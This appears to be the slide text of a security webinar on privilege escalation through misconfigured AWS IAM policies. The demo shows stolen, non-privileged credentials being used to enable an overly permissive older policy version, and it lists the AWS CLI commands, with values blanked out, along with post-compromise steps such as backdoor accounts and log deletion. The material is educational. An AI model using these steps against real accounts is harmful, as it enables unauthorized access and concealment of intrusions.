IAM Bad Privilege Escalation using Misconfigured Policies in AWS IAM Riyaz Walikar | Co-Founder - Kloudle | [email protected] May the 4th 2021 – 8:00 AM PDT (8:30 PM IST)

Riyaz Walikar Co-founder & Chief Breaker of Things @ Kloudle Inc. Twitter: @riyazwalikar, Blog: https://ibreak.software • Over a decade of experience in breaking web & mobile apps, networks, wireless, cloud and most recently container and Kubernetes • Have led Product Security and Consulting teams at Citrix and PwC SDC in a past life and was the OffSec Lead at Appsecco before moving on to co-founding Kloudle • Have multiple certifications as a result of my learning curve over the years, including CKA, CKAD, OSCP, CREST etc. (also, because they look cool on LinkedIn ☺) • Speaker at multiple cons, co-author, trainer, security evangelist with a short attention span and attracted to all things shiny

https://starwarsblog.starwars.com/wp-content/uploads/2021/04/disneyplus-star-wars-day-fan-art-takeover-7387930_TALL.jpg

What is the webinar about? • What is an AWS IAM policy? • Common examples of a misconfigured or overly permissive policy • Demo of a misconfiguration within a policy that leads to privilege escalation. • Q&A

What is an AWS IAM Policy • A policy is an object in AWS that, when associated with an identity or resource, defines their permissions. • AWS evaluates these policies when an IAM principal (user or role) makes a request. • Permissions in the policies determine whether the request is allowed or denied.

An Example AWS IAM Policy

Some examples of policy misconfigurations / permissive configurations

Common misconfigurations with Policies • Usage of wildcard * not bound to Action or Resource

Common misconfigurations with Policies • Usage of an “Action” that could lead to impersonation of another user

Common misconfigurations with Policies • Multiple policy versions with overly permissive configuration for an older version

Demo Multiple policy versions with overly permissive configuration for an older version

Demo Assumptions and Goal • Because we are demonstrating privilege escalation, we work with the assumption that we have gained access to General Tarkin’s AWS credentials • These credentials appear to be non-privileged. • Our aim is to exploit a mis-configuration with the user’s policy definition and gain access to the employee database for the Death Star

Identify who you are and if you have access

List what user defined policies are attached to the user

Get the policy’s current version number

Get v6 policy json definition

Get a list of available versions for the policy

Get v1 definition of the policy

Get v2 definition of the policy (and so on)

Get v5 definition of the policy (and notice the privileges)

Set v5 of the policy as the default policy

Access Darth Vader’s Employee database

Post privilege escalation? • With the kind of access you will get, explore what else is available within the AWS account • Attackers tend to focus on data theft/destruction and make an attempt to use resources for their own benefit (like crypto-mining) etc. • Some attackers create a shadow admin account and use this as a backdoor • To hide their traces within AWS, attacker may also remove AWS logs (CloudTrail, flowlogs etc.).

Commands from the Demo aws rds describe-db-instances --profile aws sts get-caller-identity --profile aws iam list-attached-user-policies --user-name --profile aws iam get-policy --policy-arn "" --profile aws iam get-policy-version --policy-arn "" --version-id v6 --profile aws iam list-policy-versions --policy-arn "" --profile aws iam get-policy-version --policy-arn "" --version-id v1 --profile aws iam get-policy-version --policy-arn "" --version-id v2 --profile aws iam get-policy-version --policy-arn "" --version-id v4 --profile aws iam get-policy-version --policy-arn "" --version-id v5 --profile aws iam set-default-policy-version --policy-arn "" --version-id --profile aws rds describe-db-instances --profile

Image credits • https://pngimg.com/uploads/stormtrooper/stormtrooper_PNG11.png • https://thenounproject.com/term/darth-vader/65913/ • https://starwars.fandom.com/wiki/Wilhuff_Tarkin

Q&A Site: https://kloudle.com Blog: https://kloudle.com/blog Twitter: - @kloudleinc - @riyazwalikar Reach us at: [email protected]